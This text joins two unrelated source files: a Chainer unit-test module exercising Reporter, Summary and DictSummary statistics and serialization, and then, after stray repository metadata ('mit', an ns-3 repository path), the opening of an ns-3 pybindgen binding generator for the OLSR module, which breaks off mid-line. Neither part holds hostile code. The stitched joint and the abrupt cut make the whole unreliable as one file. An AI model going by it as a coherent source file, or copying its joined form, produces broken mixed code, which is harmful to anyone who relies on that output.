import contextlib import tempfile import unittest import numpy import chainer from chainer.backends import cuda from chainer import configuration from chainer import functions from chainer import testing from chainer.testing import attr class TestReporter(unittest.TestCase): def test_empty_reporter(self): reporter = chainer.Reporter() self.assertEqual(reporter.observation, {}) def test_enter_exit(self): reporter1 = chainer.Reporter() reporter2 = chainer.Reporter() with reporter1: self.assertIs(chainer.get_current_reporter(), reporter1) with reporter2: self.assertIs(chainer.get_current_reporter(), reporter2) self.assertIs(chainer.get_current_reporter(), reporter1) def test_scope(self): reporter1 = chainer.Reporter() reporter2 = chainer.Reporter() with reporter1: observation = {} with reporter2.scope(observation): self.assertIs(chainer.get_current_reporter(), reporter2) self.assertIs(reporter2.observation, observation) self.assertIs(chainer.get_current_reporter(), reporter1) self.assertIsNot(reporter2.observation, observation) def test_add_observer(self): reporter = chainer.Reporter() observer = object() reporter.add_observer('o', observer) reporter.report({'x': 1}, observer) observation = reporter.observation self.assertIn('o/x', observation) self.assertEqual(observation['o/x'], 1) self.assertNotIn('x', observation) def test_add_observers(self): reporter = chainer.Reporter() observer1 = object() reporter.add_observer('o1', observer1) observer2 = object() reporter.add_observer('o2', observer2) reporter.report({'x': 1}, observer1) reporter.report({'y': 2}, observer2) observation = reporter.observation self.assertIn('o1/x', observation) self.assertEqual(observation['o1/x'], 1) self.assertIn('o2/y', observation) self.assertEqual(observation['o2/y'], 2) self.assertNotIn('x', observation) self.assertNotIn('y', observation) self.assertNotIn('o1/y', observation) self.assertNotIn('o2/x', observation) def test_report_without_observer(self): reporter = chainer.Reporter() reporter.report({'x': 1}) observation = reporter.observation self.assertIn('x', observation) self.assertEqual(observation['x'], 1) class TestKeepGraphOnReportFlag(unittest.TestCase): @contextlib.contextmanager def _scope(self, flag): # If flag is None, return the nop context. # Otherwise, return the context in which # keep_graph_on_report is set temporarily. old = configuration.config.keep_graph_on_report if flag is not None: configuration.config.keep_graph_on_report = flag try: yield finally: configuration.config.keep_graph_on_report = old def test_keep_graph_default(self): x = chainer.Variable(numpy.array([1], numpy.float32)) y = functions.sigmoid(x) reporter = chainer.Reporter() with self._scope(None): reporter.report({'y': y}) self.assertIsNone(reporter.observation['y'].creator) def test_keep_graph(self): x = chainer.Variable(numpy.array([1], numpy.float32)) y = functions.sigmoid(x) reporter = chainer.Reporter() with self._scope(True): reporter.report({'y': y}) assert reporter.observation['y'].creator is not None def test_not_keep_graph(self): x = chainer.Variable(numpy.array([1], numpy.float32)) y = functions.sigmoid(x) reporter = chainer.Reporter() with self._scope(False): reporter.report({'y': y}) self.assertIsNone(reporter.observation['y'].creator) class TestReport(unittest.TestCase): def test_report_without_reporter(self): observer = object() chainer.report({'x': 1}, observer) def test_report(self): reporter = chainer.Reporter() with reporter: chainer.report({'x': 1}) observation = reporter.observation self.assertIn('x', observation) self.assertEqual(observation['x'], 1) def test_report_with_observer(self): reporter = chainer.Reporter() observer = object() reporter.add_observer('o', observer) with reporter: chainer.report({'x': 1}, observer) observation = reporter.observation self.assertIn('o/x', observation) self.assertEqual(observation['o/x'], 1) def test_report_with_unregistered_observer(self): reporter = chainer.Reporter() observer = object() with reporter: with self.assertRaises(KeyError): chainer.report({'x': 1}, observer) def test_report_scope(self): reporter = chainer.Reporter() observation = {} with reporter: with chainer.report_scope(observation): chainer.report({'x': 1}) self.assertIn('x', observation) self.assertEqual(observation['x'], 1) self.assertNotIn('x', reporter.observation) class TestSummary(unittest.TestCase): def setUp(self): self.summary = chainer.reporter.Summary() def test_numpy(self): self.summary.add(numpy.array(1, 'f')) self.summary.add(numpy.array(-2, 'f')) mean = self.summary.compute_mean() testing.assert_allclose(mean, numpy.array(-0.5, 'f')) mean, std = self.summary.make_statistics() testing.assert_allclose(mean, numpy.array(-0.5, 'f')) testing.assert_allclose(std, numpy.array(1.5, 'f')) @attr.gpu def test_cupy(self): xp = cuda.cupy self.summary.add(xp.array(1, 'f')) self.summary.add(xp.array(-2, 'f')) mean = self.summary.compute_mean() testing.assert_allclose(mean, numpy.array(-0.5, 'f')) mean, std = self.summary.make_statistics() testing.assert_allclose(mean, numpy.array(-0.5, 'f')) testing.assert_allclose(std, numpy.array(1.5, 'f')) def test_int(self): self.summary.add(1) self.summary.add(2) self.summary.add(3) mean = self.summary.compute_mean() testing.assert_allclose(mean, 2) mean, std = self.summary.make_statistics() testing.assert_allclose(mean, 2) testing.assert_allclose(std, numpy.sqrt(2 / 3)) def test_float(self): self.summary.add(1.) self.summary.add(2.) self.summary.add(3.) mean = self.summary.compute_mean() testing.assert_allclose(mean, 2.) mean, std = self.summary.make_statistics() testing.assert_allclose(mean, 2.) testing.assert_allclose(std, numpy.sqrt(2. / 3.)) def test_weight(self): self.summary.add(1., 0.5) self.summary.add(2., numpy.array(0.4)) self.summary.add(3., chainer.Variable(numpy.array(0.3))) mean = self.summary.compute_mean().array val = (1 * 0.5 + 2 * 0.4 + 3 * 0.3) / (0.5 + 0.4 + 0.3) testing.assert_allclose(mean, val) def test_serialize(self): self.summary.add(1.) self.summary.add(2.) summary = chainer.reporter.Summary() testing.save_and_load_npz(self.summary, summary) summary.add(3.) mean = summary.compute_mean() testing.assert_allclose(mean, 2.) mean, std = summary.make_statistics() testing.assert_allclose(mean, 2.) testing.assert_allclose(std, numpy.sqrt(2. / 3.)) @attr.gpu def test_serialize_cupy(self): xp = cuda.cupy self.summary.add(xp.array(1, 'f')) self.summary.add(xp.array(2, 'f')) summary = chainer.reporter.Summary() testing.save_and_load_npz(self.summary, summary) summary.add(xp.array(3, 'f')) mean = summary.compute_mean() testing.assert_allclose(mean, 2.) mean, std = summary.make_statistics() testing.assert_allclose(mean, 2.) testing.assert_allclose(std, numpy.sqrt(2. / 3.)) def test_serialize_backward_compat(self): with tempfile.NamedTemporaryFile(delete=False) as f: # old version does not save anything numpy.savez(f, dummy=0) with testing.assert_warns(UserWarning): chainer.serializers.load_npz(f.name, self.summary) self.summary.add(2.) self.summary.add(3.) mean = self.summary.compute_mean() testing.assert_allclose(mean, 2.5) mean, std = self.summary.make_statistics() testing.assert_allclose(mean, 2.5) testing.assert_allclose(std, 0.5) class TestDictSummary(unittest.TestCase): def setUp(self): self.summary = chainer.reporter.DictSummary() def check(self, summary, data): mean = summary.compute_mean() self.assertEqual(set(mean.keys()), set(data.keys())) for name in data.keys(): m = sum(data[name]) / len(data[name]) testing.assert_allclose(mean[name], m) stats = summary.make_statistics() self.assertEqual( set(stats.keys()), set(data.keys()).union(name + '.std' for name in data.keys())) for name in data.keys(): m = sum(data[name]) / len(data[name]) s = numpy.sqrt( sum(x * x for x in data[name]) / len(data[name]) - m * m) testing.assert_allclose(stats[name], m) testing.assert_allclose(stats[name + '.std'], s) def test(self): self.summary.add({'numpy': numpy.array(3, 'f'), 'int': 1, 'float': 4.}) self.summary.add({'numpy': numpy.array(1, 'f'), 'int': 5, 'float': 9.}) self.summary.add({'numpy': numpy.array(2, 'f'), 'int': 6, 'float': 5.}) self.summary.add({'numpy': numpy.array(3, 'f'), 'int': 5, 'float': 8.}) self.check(self.summary, { 'numpy': (3., 1., 2., 3.), 'int': (1, 5, 6, 5), 'float': (4., 9., 5., 8.), }) @attr.gpu def test_cupy(self): xp = cuda.cupy self.summary.add({'cupy': xp.array(3, 'f')}) self.summary.add({'cupy': xp.array(1, 'f')}) self.summary.add({'cupy': xp.array(2, 'f')}) self.summary.add({'cupy': xp.array(3, 'f')}) self.check(self.summary, {'cupy': (3., 1., 2., 3.)}) def test_sparse(self): self.summary.add({'a': 3., 'b': 1.}) self.summary.add({'a': 1., 'b': 5., 'c': 9.}) self.summary.add({'b': 6.}) self.summary.add({'a': 3., 'b': 5., 'c': 8.}) self.check(self.summary, { 'a': (3., 1., 3.), 'b': (1., 5., 6., 5.), 'c': (9., 8.), }) def test_weight(self): self.summary.add({'a': (1., 0.5)}) self.summary.add({'a': (2., numpy.array(0.4))}) self.summary.add({'a': (3., chainer.Variable(numpy.array(0.3)))}) mean = self.summary.compute_mean() val = (1 * 0.5 + 2 * 0.4 + 3 * 0.3) / (0.5 + 0.4 + 0.3) testing.assert_allclose(mean['a'], val) with self.assertRaises(ValueError): self.summary.add({'a': (4., numpy.array([0.5]))}) with self.assertRaises(ValueError): self.summary.add({'a': (4., chainer.Variable(numpy.array([0.5])))}) def test_serialize(self): self.summary.add({'numpy': numpy.array(3, 'f'), 'int': 1, 'float': 4.}) self.summary.add({'numpy': numpy.array(1, 'f'), 'int': 5, 'float': 9.}) self.summary.add({'numpy': numpy.array(2, 'f'), 'int': 6, 'float': 5.}) summary = chainer.reporter.DictSummary() testing.save_and_load_npz(self.summary, summary) summary.add({'numpy': numpy.array(3, 'f'), 'int': 5, 'float': 8.}) self.check(summary, { 'numpy': (3., 1., 2., 3.), 'int': (1, 5, 6, 5), 'float': (4., 9., 5., 8.), }) @attr.gpu def test_serialize_cupy(self): xp = cuda.cupy self.summary.add({'cupy': xp.array(3, 'f')}) self.summary.add({'cupy': xp.array(1, 'f')}) self.summary.add({'cupy': xp.array(2, 'f')}) summary = chainer.reporter.DictSummary() testing.save_and_load_npz(self.summary, summary) summary.add({'cupy': xp.array(3, 'f')}) self.check(summary, {'cupy': (3., 1., 2., 3.)}) def test_serialize_names_with_slash(self): self.summary.add({'a/b': 3., '/a/b': 1., 'a/b/': 4.}) self.summary.add({'a/b': 1., '/a/b': 5., 'a/b/': 9.}) self.summary.add({'a/b': 2., '/a/b': 6., 'a/b/': 5.}) summary = chainer.reporter.DictSummary() testing.save_and_load_npz(self.summary, summary) summary.add({'a/b': 3., '/a/b': 5., 'a/b/': 8.}) self.check(summary, { 'a/b': (3., 1., 2., 3.), '/a/b': (1., 5., 6., 5.), 'a/b/': (4., 9., 5., 8.), }) def test_serialize_overwrite_different_names(self): self.summary.add({'a': 3., 'b': 1.}) self.summary.add({'a': 1., 'b': 5.}) summary = chainer.reporter.DictSummary() summary.add({'c': 5.}) testing.save_and_load_npz(self.summary, summary) self.check(summary, { 'a': (3., 1.), 'b': (1., 5.), }) def test_serialize_overwrite_rollback(self): self.summary.add({'a': 3., 'b': 1.}) self.summary.add({'a': 1., 'b': 5.}) with tempfile.NamedTemporaryFile(delete=False) as f: chainer.serializers.save_npz(f.name, self.summary) self.summary.add({'a': 2., 'b': 6., 'c': 5.}) self.summary.add({'a': 3., 'b': 4., 'c': 6.}) chainer.serializers.load_npz(f.name, self.summary) self.summary.add({'a': 3., 'b': 5., 'c': 8.}) self.check(self.summary, { 'a': (3., 1., 3.), 'b': (1., 5., 5.), 'c': (8.,), }) def test_serialize_backward_compat(self): with tempfile.NamedTemporaryFile(delete=False) as f: # old version does not save anything numpy.savez(f, dummy=0) with testing.assert_warns(UserWarning): chainer.serializers.load_npz(f.name, self.summary) def test_serialize_backward_compat_overwrite(self): self.summary.add({'a': 3., 'b': 1., 'c': 4.}) self.summary.add({'a': 1., 'b': 5., 'c': 9.}) with tempfile.NamedTemporaryFile(delete=False) as f: # old version does not save anything numpy.savez(f, dummy=0) with testing.assert_warns(UserWarning): chainer.serializers.load_npz(f.name, self.summary) self.summary.add({'a': 9., 'b': 2.}) self.summary.add({'a': 6., 'b': 5.}) self.check(self.summary, { 'a': (9., 6.), 'b': (2., 5.), }) testing.run_module(__name__, __file__)
mit
chenzheng128/ns-3-dev-git
src/olsr/bindings/modulegen__gcc_ILP32.py
8
502481
from pybindgen import Module, FileCodeSink, param, retval, cppclass, typehandlers import pybindgen.settings import warnings class ErrorHandler(pybindgen.settings.ErrorHandler): def handle_error(self, wrapper, exception, traceback_): warnings.warn("exception %r in wrapper %s" % (exception, wrapper)) return True pybindgen.settings.error_handler = ErrorHandler() import sys def module_init(): root_module = Module('ns.olsr', cpp_namespace='::ns3') return root_module def register_types(module): root_module = module.get_root() ## address.h (module 'network'): ns3::Address [class] module.add_class('Address', import_from_module='ns.network') ## address.h (module 'network'): ns3::Address::MaxSize_e [enumeration] module.add_enum('MaxSize_e', ['MAX_SIZE'], outer_class=root_module['ns3::Address'], import_from_module='ns.network') ## attribute-construction-list.h (module 'core'): ns3::AttributeConstructionList [class] module.add_class('AttributeConstructionList', import_from_module='ns.core') ## attribute-construction-list.h (module 'core'): ns3::AttributeConstructionList::Item [struct] module.add_class('Item', import_from_module='ns.core', outer_class=root_module['ns3::AttributeConstructionList']) ## buffer.h (module 'network'): ns3::Buffer [class] module.add_class('Buffer', import_from_module='ns.network') ## buffer.h (module 'network'): ns3::Buffer::Iterator [class] module.add_class('Iterator', import_from_module='ns.network', outer_class=root_module['ns3::Buffer']) ## packet.h (module 'network'): ns3::ByteTagIterator [class] module.add_class('ByteTagIterator', import_from_module='ns.network') ## packet.h (module 'network'): ns3::ByteTagIterator::Item [class] module.add_class('Item', import_from_module='ns.network', outer_class=root_module['ns3::ByteTagIterator']) ## byte-tag-list.h (module 'network'): ns3::ByteTagList [class] module.add_class('ByteTagList', import_from_module='ns.network') ## byte-tag-list.h (module 'network'): ns3::ByteTagList::Iterator [class] module.add_class('Iterator', import_from_module='ns.network', outer_class=root_module['ns3::ByteTagList']) ## byte-tag-list.h (module 'network'): ns3::ByteTagList::Iterator::Item [struct] module.add_class('Item', import_from_module='ns.network', outer_class=root_module['ns3::ByteTagList::Iterator']) ## callback.h (module 'core'): ns3::CallbackBase [class] module.add_class('CallbackBase', import_from_module='ns.core') ## event-garbage-collector.h (module 'core'): ns3::EventGarbageCollector [class] module.add_class('EventGarbageCollector', import_from_module='ns.core') ## event-id.h (module 'core'): ns3::EventId [class] module.add_class('EventId', import_from_module='ns.core') ## hash.h (module 'core'): ns3::Hasher [class] module.add_class('Hasher', import_from_module='ns.core') ## inet6-socket-address.h (module 'network'): ns3::Inet6SocketAddress [class] module.add_class('Inet6SocketAddress', import_from_module='ns.network') ## inet6-socket-address.h (module 'network'): ns3::Inet6SocketAddress [class] root_module['ns3::Inet6SocketAddress'].implicitly_converts_to(root_module['ns3::Address']) ## inet-socket-address.h (module 'network'): ns3::InetSocketAddress [class] module.add_class('InetSocketAddress', import_from_module='ns.network') ## inet-socket-address.h (module 'network'): ns3::InetSocketAddress [class] root_module['ns3::InetSocketAddress'].implicitly_converts_to(root_module['ns3::Address']) ## int-to-type.h (module 'core'): ns3::IntToType<0> [struct] module.add_class('IntToType', import_from_module='ns.core', template_parameters=['0']) ## int-to-type.h (module 'core'): ns3::IntToType<0>::v_e [enumeration] module.add_enum('v_e', ['value'], outer_class=root_module['ns3::IntToType< 0 >'], import_from_module='ns.core') ## int-to-type.h (module 'core'): ns3::IntToType<1> [struct] module.add_class('IntToType', import_from_module='ns.core', template_parameters=['1']) ## int-to-type.h (module 'core'): ns3::IntToType<1>::v_e [enumeration] module.add_enum('v_e', ['value'], outer_class=root_module['ns3::IntToType< 1 >'], import_from_module='ns.core') ## int-to-type.h (module 'core'): ns3::IntToType<2> [struct] module.add_class('IntToType', import_from_module='ns.core', template_parameters=['2']) ## int-to-type.h (module 'core'): ns3::IntToType<2>::v_e [enumeration] module.add_enum('v_e', ['value'], outer_class=root_module['ns3::IntToType< 2 >'], import_from_module='ns.core') ## int-to-type.h (module 'core'): ns3::IntToType<3> [struct] module.add_class('IntToType', import_from_module='ns.core', template_parameters=['3']) ## int-to-type.h (module 'core'): ns3::IntToType<3>::v_e [enumeration] module.add_enum('v_e', ['value'], outer_class=root_module['ns3::IntToType< 3 >'], import_from_module='ns.core') ## int-to-type.h (module 'core'): ns3::IntToType<4> [struct] module.add_class('IntToType', import_from_module='ns.core', template_parameters=['4']) ## int-to-type.h (module 'core'): ns3::IntToType<4>::v_e [enumeration] module.add_enum('v_e', ['value'], outer_class=root_module['ns3::IntToType< 4 >'], import_from_module='ns.core') ## int-to-type.h (module 'core'): ns3::IntToType<5> [struct] module.add_class('IntToType', import_from_module='ns.core', template_parameters=['5']) ## int-to-type.h (module 'core'): ns3::IntToType<5>::v_e [enumeration] module.add_enum('v_e', ['value'], outer_class=root_module['ns3::IntToType< 5 >'], import_from_module='ns.core') ## int-to-type.h (module 'core'): ns3::IntToType<6> [struct] module.add_class('IntToType', import_from_module='ns.core', template_parameters=['6']) ## int-to-type.h (module 'core'): ns3::IntToType<6>::v_e [enumeration] module.add_enum('v_e', ['value'], outer_class=root_module['ns3::IntToType< 6 >'], import_from_module='ns.core') ## ipv4-address.h (module 'network'): ns3::Ipv4Address [class] module.add_class('Ipv4Address', import_from_module='ns.network') ## ipv4-address.h (module 'network'): ns3::Ipv4Address [class] root_module['ns3::Ipv4Address'].implicitly_converts_to(root_module['ns3::Address']) ## ipv4-interface-address.h (module 'internet'): ns3::Ipv4InterfaceAddress [class] module.add_class('Ipv4InterfaceAddress', import_from_module='ns.internet') ## ipv4-interface-address.h (module 'internet'): ns3::Ipv4InterfaceAddress::InterfaceAddressScope_e [enumeration] module.add_enum('InterfaceAddressScope_e', ['HOST', 'LINK', 'GLOBAL'], outer_class=root_module['ns3::Ipv4InterfaceAddress'], import_from_module='ns.internet') ## ipv4-address.h (module 'network'): ns3::Ipv4Mask [class] module.add_class('Ipv4Mask', import_from_module='ns.network') ## ipv4-routing-helper.h (module 'internet'): ns3::Ipv4RoutingHelper [class] module.add_class('Ipv4RoutingHelper', allow_subclassing=True, import_from_module='ns.internet') ## ipv6-address.h (module 'network'): ns3::Ipv6Address [class] module.add_class('Ipv6Address', import_from_module='ns.network') ## ipv6-address.h (module 'network'): ns3::Ipv6Address [class] root_module['ns3::Ipv6Address'].implicitly_converts_to(root_module['ns3::Address']) ## ipv6-address.h (module 'network'): ns3::Ipv6Prefix [class] module.add_class('Ipv6Prefix', import_from_module='ns.network') ## mac48-address.h (module 'network'): ns3::Mac48Address [class] module.add_class('Mac48Address', import_from_module='ns.network') ## mac48-address.h (module 'network'): ns3::Mac48Address [class] root_module['ns3::Mac48Address'].implicitly_converts_to(root_module['ns3::Address']) ## node-container.h (module 'network'): ns3::NodeContainer [class] module.add_class('NodeContainer', import_from_module='ns.network') ## non-copyable.h (module 'core'): ns3::NonCopyable [class] module.add_class('NonCopyable', destructor_visibility='protected', import_from_module='ns.core') ## object-base.h (module 'core'): ns3::ObjectBase [class] module.add_class('ObjectBase', allow_subclassing=True, import_from_module='ns.core') ## object.h (module 'core'): ns3::ObjectDeleter [struct] module.add_class('ObjectDeleter', import_from_module='ns.core') ## object-factory.h (module 'core'): ns3::ObjectFactory [class] module.add_class('ObjectFactory', import_from_module='ns.core') ## olsr-helper.h (module 'olsr'): ns3::OlsrHelper [class] module.add_class('OlsrHelper', parent=root_module['ns3::Ipv4RoutingHelper']) ## packet-metadata.h (module 'network'): ns3::PacketMetadata [class] module.add_class('PacketMetadata', import_from_module='ns.network') ## packet-metadata.h (module 'network'): ns3::PacketMetadata::Item [struct] module.add_class('Item', import_from_module='ns.network', outer_class=root_module['ns3::PacketMetadata']) ## packet-metadata.h (module 'network'): ns3::PacketMetadata::Item [enumeration] module.add_enum('', ['PAYLOAD', 'HEADER', 'TRAILER'], outer_class=root_module['ns3::PacketMetadata::Item'], import_from_module='ns.network') ## packet-metadata.h (module 'network'): ns3::PacketMetadata::ItemIterator [class] module.add_class('ItemIterator', import_from_module='ns.network', outer_class=root_module['ns3::PacketMetadata']) ## packet.h (module 'network'): ns3::PacketTagIterator [class] module.add_class('PacketTagIterator', import_from_module='ns.network') ## packet.h (module 'network'): ns3::PacketTagIterator::Item [class] module.add_class('Item', import_from_module='ns.network', outer_class=root_module['ns3::PacketTagIterator']) ## packet-tag-list.h (module 'network'): ns3::PacketTagList [class] module.add_class('PacketTagList', import_from_module='ns.network') ## packet-tag-list.h (module 'network'): ns3::PacketTagList::TagData [struct] module.add_class('TagData', import_from_module='ns.network', outer_class=root_module['ns3::PacketTagList']) ## packet-tag-list.h (module 'network'): ns3::PacketTagList::TagData::TagData_e [enumeration] module.add_enum('TagData_e', ['MAX_SIZE'], outer_class=root_module['ns3::PacketTagList::TagData'], import_from_module='ns.network') ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::Object, ns3::ObjectBase, ns3::ObjectDeleter> [class] module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::Object', 'ns3::ObjectBase', 'ns3::ObjectDeleter'], parent=root_module['ns3::ObjectBase'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount')) ## simulator.h (module 'core'): ns3::Simulator [class] module.add_class('Simulator', destructor_visibility='private', import_from_module='ns.core') ## simulator.h (module 'core'): ns3::Simulator [enumeration] module.add_enum('', ['NO_CONTEXT'], outer_class=root_module['ns3::Simulator'], import_from_module='ns.core') ## system-wall-clock-ms.h (module 'core'): ns3::SystemWallClockMs [class] module.add_class('SystemWallClockMs', import_from_module='ns.core') ## tag.h (module 'network'): ns3::Tag [class] module.add_class('Tag', import_from_module='ns.network', parent=root_module['ns3::ObjectBase']) ## tag-buffer.h (module 'network'): ns3::TagBuffer [class] module.add_class('TagBuffer', import_from_module='ns.network') ## nstime.h (module 'core'): ns3::TimeWithUnit [class] module.add_class('TimeWithUnit', import_from_module='ns.core') ## timer.h (module 'core'): ns3::Timer [class] module.add_class('Timer', import_from_module='ns.core') ## timer.h (module 'core'): ns3::Timer::DestroyPolicy [enumeration] module.add_enum('DestroyPolicy', ['CANCEL_ON_DESTROY', 'REMOVE_ON_DESTROY', 'CHECK_ON_DESTROY'], outer_class=root_module['ns3::Timer'], import_from_module='ns.core') ## timer.h (module 'core'): ns3::Timer::State [enumeration] module.add_enum('State', ['RUNNING', 'EXPIRED', 'SUSPENDED'], outer_class=root_module['ns3::Timer'], import_from_module='ns.core') ## timer-impl.h (module 'core'): ns3::TimerImpl [class] module.add_class('TimerImpl', allow_subclassing=True, import_from_module='ns.core') ## type-id.h (module 'core'): ns3::TypeId [class] module.add_class('TypeId', import_from_module='ns.core') ## type-id.h (module 'core'): ns3::TypeId::AttributeFlag [enumeration] module.add_enum('AttributeFlag', ['ATTR_GET', 'ATTR_SET', 'ATTR_CONSTRUCT', 'ATTR_SGC'], outer_class=root_module['ns3::TypeId'], import_from_module='ns.core') ## type-id.h (module 'core'): ns3::TypeId::SupportLevel [enumeration] module.add_enum('SupportLevel', ['SUPPORTED', 'DEPRECATED', 'OBSOLETE'], outer_class=root_module['ns3::TypeId'], import_from_module='ns.core') ## type-id.h (module 'core'): ns3::TypeId::AttributeInformation [struct] module.add_class('AttributeInformation', import_from_module='ns.core', outer_class=root_module['ns3::TypeId']) ## type-id.h (module 'core'): ns3::TypeId::TraceSourceInformation [struct] module.add_class('TraceSourceInformation', import_from_module='ns.core', outer_class=root_module['ns3::TypeId']) ## empty.h (module 'core'): ns3::empty [class] module.add_class('empty', import_from_module='ns.core') ## int64x64-double.h (module 'core'): ns3::int64x64_t [class] module.add_class('int64x64_t', import_from_module='ns.core') ## int64x64-double.h (module 'core'): ns3::int64x64_t::impl_type [enumeration] module.add_enum('impl_type', ['int128_impl', 'cairo_impl', 'ld_impl'], outer_class=root_module['ns3::int64x64_t'], import_from_module='ns.core') ## chunk.h (module 'network'): ns3::Chunk [class] module.add_class('Chunk', import_from_module='ns.network', parent=root_module['ns3::ObjectBase']) ## header.h (module 'network'): ns3::Header [class] module.add_class('Header', import_from_module='ns.network', parent=root_module['ns3::Chunk']) ## ipv4-header.h (module 'internet'): ns3::Ipv4Header [class] module.add_class('Ipv4Header', import_from_module='ns.internet', parent=root_module['ns3::Header']) ## ipv4-header.h (module 'internet'): ns3::Ipv4Header::DscpType [enumeration] module.add_enum('DscpType', ['DscpDefault', 'DSCP_CS1', 'DSCP_AF11', 'DSCP_AF12', 'DSCP_AF13', 'DSCP_CS2', 'DSCP_AF21', 'DSCP_AF22', 'DSCP_AF23', 'DSCP_CS3', 'DSCP_AF31', 'DSCP_AF32', 'DSCP_AF33', 'DSCP_CS4', 'DSCP_AF41', 'DSCP_AF42', 'DSCP_AF43', 'DSCP_CS5', 'DSCP_EF', 'DSCP_CS6', 'DSCP_CS7'], outer_class=root_module['ns3::Ipv4Header'], import_from_module='ns.internet') ## ipv4-header.h (module 'internet'): ns3::Ipv4Header::EcnType [enumeration] module.add_enum('EcnType', ['ECN_NotECT', 'ECN_ECT1', 'ECN_ECT0', 'ECN_CE'], outer_class=root_module['ns3::Ipv4Header'], import_from_module='ns.internet') ## object.h (module 'core'): ns3::Object [class] module.add_class('Object', import_from_module='ns.core', parent=root_module['ns3::SimpleRefCount< ns3::Object, ns3::ObjectBase, ns3::ObjectDeleter >']) ## object.h (module 'core'): ns3::Object::AggregateIterator [class] module.add_class('AggregateIterator', import_from_module='ns.core', outer_class=root_module['ns3::Object']) ## random-variable-stream.h (module 'core'): ns3::RandomVariableStream [class] module.add_class('RandomVariableStream', import_from_module='ns.core', parent=root_module['ns3::Object']) ## random-variable-stream.h (module 'core'): ns3::SequentialRandomVariable [class] module.add_class('SequentialRandomVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariableStream']) ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter<ns3::AttributeAccessor> > [class] module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::AttributeAccessor', 'ns3::empty', 'ns3::DefaultDeleter<ns3::AttributeAccessor>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount')) ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter<ns3::AttributeChecker> > [class] module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::AttributeChecker', 'ns3::empty', 'ns3::DefaultDeleter<ns3::AttributeChecker>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount')) ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter<ns3::AttributeValue> > [class] module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::AttributeValue', 'ns3::empty', 'ns3::DefaultDeleter<ns3::AttributeValue>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount')) ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter<ns3::CallbackImplBase> > [class] module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::CallbackImplBase', 'ns3::empty', 'ns3::DefaultDeleter<ns3::CallbackImplBase>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount')) ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::EventImpl, ns3::empty, ns3::DefaultDeleter<ns3::EventImpl> > [class] module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::EventImpl', 'ns3::empty', 'ns3::DefaultDeleter<ns3::EventImpl>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount')) ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::Hash::Implementation, ns3::empty, ns3::DefaultDeleter<ns3::Hash::Implementation> > [class] module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::Hash::Implementation', 'ns3::empty', 'ns3::DefaultDeleter<ns3::Hash::Implementation>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount')) ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::Ipv4MulticastRoute, ns3::empty, ns3::DefaultDeleter<ns3::Ipv4MulticastRoute> > [class] module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::Ipv4MulticastRoute', 'ns3::empty', 'ns3::DefaultDeleter<ns3::Ipv4MulticastRoute>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount')) ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::Ipv4Route, ns3::empty, ns3::DefaultDeleter<ns3::Ipv4Route> > [class] module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::Ipv4Route', 'ns3::empty', 'ns3::DefaultDeleter<ns3::Ipv4Route>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount')) ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::NetDeviceQueue, ns3::empty, ns3::DefaultDeleter<ns3::NetDeviceQueue> > [class] module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::NetDeviceQueue', 'ns3::empty', 'ns3::DefaultDeleter<ns3::NetDeviceQueue>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount')) ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::NixVector, ns3::empty, ns3::DefaultDeleter<ns3::NixVector> > [class] module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::NixVector', 